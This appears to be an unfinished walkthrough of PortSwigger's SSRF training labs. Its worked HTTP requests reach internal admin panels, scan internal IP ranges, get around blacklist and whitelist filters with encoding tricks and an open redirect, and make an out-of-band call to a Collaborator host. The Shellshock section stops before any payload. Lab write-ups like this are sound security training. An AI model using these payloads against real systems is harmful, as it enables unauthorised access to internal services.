IN PROGRESS: WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF)

Walk-through of the Server-side request forgery (SSRF) lab on PortSwigger Web Security Academy.

Apprentice – Basic SSRF against the local server
Apprentice – Basic SSRF against another back-end system
Practitioner – SSRF with blacklist-based input filter
Practitioner – SSRF with filter bypass via open redirection vulnerability
Practitioner – Blind SSRF with out-of-band detection
Expert – SSRF with whitelist-based input filter
Expert – Blind SSRF with Shellshock exploitation

Apprentice – Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

Vulnerable request

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Exploit

POST /product/stock HTTP/1.1
...

stockApi=http://localhost/admin

The output shows other available APIs

POST /product/stock HTTP/1.1
...

stockApi=http://localhost/admin/delete?username=carlos

Apprentice – Basic SSRF against another back-end system

Access the lab

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

Send the request from previous lab to the Intruder module in Burp Suite. Vary the IP part 192.168.0.1-254 and check the server response. IP 192.168.0.227 returns code 404.

POST /product/stock HTTP/1.1
...

stockApi=http://192.168.0.§X§:8080

Send request for 192.168.0.227 to the Repeater module.

POST /product/stock HTTP/1.1
...

stockApi=http://192.168.0.227:8080/admin/delete?username=carlos

Practitioner – SSRF with blacklist-based input filter

Access the lab

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

On the Home page, click on View details for a product.
Click on Check stock.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Send the request to the Repeater module. Try to access 127.0.0.1.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.0.0.1

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 51

"External stock check blocked for security reasons"

Try to bypass restriction on localhost. Use “127.1” to redirect to 127.0.0.1.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=XNmKeRHfgJS2pvEvtz4IvoQ1MRzvWnP4; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 10402

...
<a href="/admin">Admin panel</a>
...

Try to access /admin.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/admin

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 51

"External stock check blocked for security reasons"

Use double-encoding to obfuscate “admin”. For example, URL encode letter “a” (%61), then encode the “%” symbol (%25). So letter “a” is %2561.

Use the Hackvertor extension.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin/<@/urlencode_all><@/replace>

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: session=gHJsWE2fVC4CTRdcoZoT4RSIoy4MCRlg; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 2830

...
<a href="/admin/delete?username=carlos">Delete</a>
...

Delete user carlos.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin<@/urlencode_all><@/replace>/delete?username=carlos

Practitioner – SSRF with filter bypass via open redirection vulnerability

Access the lab

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos. The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.

On the Home page, click on View details for a product.

GET /product?productId=1 HTTP/1.1
...

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 10417

...
<a href="/product/nextProduct?currentProductId=1&path=/product?productId=2">| Next product</a>
...

The Next product link contains a path. We can use this for the Open redirect. Send a request using the Repeater.

GET /product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin HTTP/1.1
...

HTTP/1.1 302 Found
Location: http://192.168.0.12:8080/admin
Connection: close
Content-Length: 0

On the Home page, click on View details for a product.
Click on Check stock.

POST /product/stock HTTP/1.1
...

stockApi=/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin

Modify the stockApi to use the URL of the Open redirect.

POST /product/stock HTTP/1.1
...

stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin<@/urlencode>

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Connection: close
Content-Length: 2933

...
<a href="/http://192.168.0.12:8080/admin/delete?username=carlos">Delete</a>
...

Delete user carlos.

POST /product/stock HTTP/1.1
...

stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos<@/urlencode>

Practitioner – Blind SSRF with out-of-band detection

Access the lab

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.

On the Home page, click on View details for a product.
Send the request to the Repeater module.

GET /product?productId=1 HTTP/1.1
...
Referer: https://<LAB ID>.web-security-academy.net/
...

Replace the Referer HTTP header value by the Burp Collaborator URL.

GET /product?productId=1 HTTP/1.1
...
Referer: https://<BURP COLLABORATOR ID>.oastify.com/
...

The Burp Collaborator receives a request.

Expert – SSRF with whitelist-based input filter

Access the lab

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed an anti-SSRF defense you will need to bypass.

On the Home page, click on View details for a product.
Click on Check stock.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Send the request to the Repeater module. Try accessing the admin interface.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2Flocalhost/admin

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 58

"External stock check host must be stock.weliketoshop.net"

Bypass the filter:

Credentials are accepted (http://username@stock.weliketoshop.net). Add the localhost instead of credentials.
We want to generate this URL: http://localhost#@stock.weliketoshop.net/admin. Double-URL encode the # to %2523

POST /product/stock HTTP/1.1
...

stockApi=http://localhost%2523@stock.weliketoshop.net/admin

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Set-Cookie: session=zhWwrVfnYDfAMImLLUxp2fNW4JWnGr0r; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 2830

...
<a href="/admin/delete?username=carlos">Delete</a>
...

Delete user carlos.

POST /product/stock HTTP/1.1
...

stockApi=http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos

Expert – Blind SSRF with Shellshock exploitation

Access the lab

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user.

Install the Collaborator Everywhere extension for Burp Suite.
Add the domain (<LAB ID>.web-security-academy.net) of the lab to Burp Suite’s target scope, so that Collaborator Everywhere will target it.
Navigate the webapp.
In the Target tab, new issues will be create for the /product:
- Collaborator Pingback (HTTP): Referer
- Collaborator Pingback (HTTP): User-Agent